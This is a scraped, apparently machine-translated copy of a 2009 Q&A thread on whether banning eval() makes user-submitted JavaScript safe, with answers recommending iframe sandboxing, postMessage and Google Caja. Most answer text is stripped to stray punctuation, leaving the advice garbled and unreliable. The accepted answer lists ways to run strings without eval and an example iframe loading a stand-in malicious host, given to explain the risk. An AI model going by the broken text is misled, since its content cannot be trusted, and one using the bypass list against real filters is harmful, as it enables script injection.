How can I make external code “safe” to run? Just disable eval ()?

Question

How can I make external code “safe” to run? Just disable eval ()?

I would like members of the community to be able to provide their own javascript code for use by other users, because the imagination of users collectively is much more than I could imagine.

But this raises an inherent security issue, especially when the goal is to run external code.

So, can I just ban eval()from submissions and do with it? Or are there other ways to evaluate the code or cause massive panic in javascript?

There are other things that need to be disabled, but my main problem is that if I cannot prevent the execution of strings, any other filters that I use for certain methods can be bypassed. Opportunity, or do I have to resort to requiring the author to provide a web service interface?

+5

javascript security xss

Phil h Apr 11 '09 at 10:42

source share

6 answers

HTML5 , sandbox JavaScript.

OWASP HTML5 Cheat Sheet :

sandbox iframe .
iframe iframe. , :
.
.
.
, , .
.
iframe, sandbox.
, , . , , .
, Clickjacking X-Frame-Options, deny same-origin. , framebusting if(window!== window.top) { window.top.location = location; }, .

, . , , , , XSS , (.. IFrame).

eval , , , . Window.postMessage. , @bobince answer .

. , , .

+9

SilverlightFox 11 . '14 15:45

, Javascript . , , , . , , , .

+5

Anthony 11 . '09 10:54

, Javascript- , - eval() ( Javascript, eval() - , HTML , , document.write() script ..).

, JS , , ( ), , - ( ).

+1

jpalecek 11 . '09 11:03

eval, , . , : window['ev' + 'al']('alert("hello world");');. , , eval...

0

svinto 11 . '09 11:04

. iframe sandbox (. ) - ( , - ).

If you need to somehow interact with the sandboxed method described above, you can use the messaging engine. This is a bit complicated, but there are some libraries that simplify the task, including one that I created: https://github.com/asvd/jailed

0

asvd Jan 18 '15 at 14:08

source share

bobince · Accepted Answer · 2009-04-11T11:57:42+0000

Or there are other ways to evaluate the code

eval() script -parsing, JavaScript Turing-complete, . . . svinto . window.eval, , , ( ):

new ('code')()
document.write( '% 3Cscript > % 3C/ script > ')
document.createElement( 'script'). AppendChild (document.createTextNode( ''))
window.setTimeout('code', 0);
window.open(...). Eval ( '')
location.href="JavaScript:
IE, / node.setExpression('someproperty', 'code')
, node.onomeevent = 'code';
, Object.prototype.eval('code')

javascript?

createElement ('iframe'). src= 'http://evil.iframeexploitz.ru/aff=2345' - , ... , script , , . " !" , . .

, -?

:

, , GreaseMonkey
vet script
( JavaScript) -,

, , Google Caja. , ; , - , , .

How can I make external code “safe” to run? Just disable eval ()?

More articles: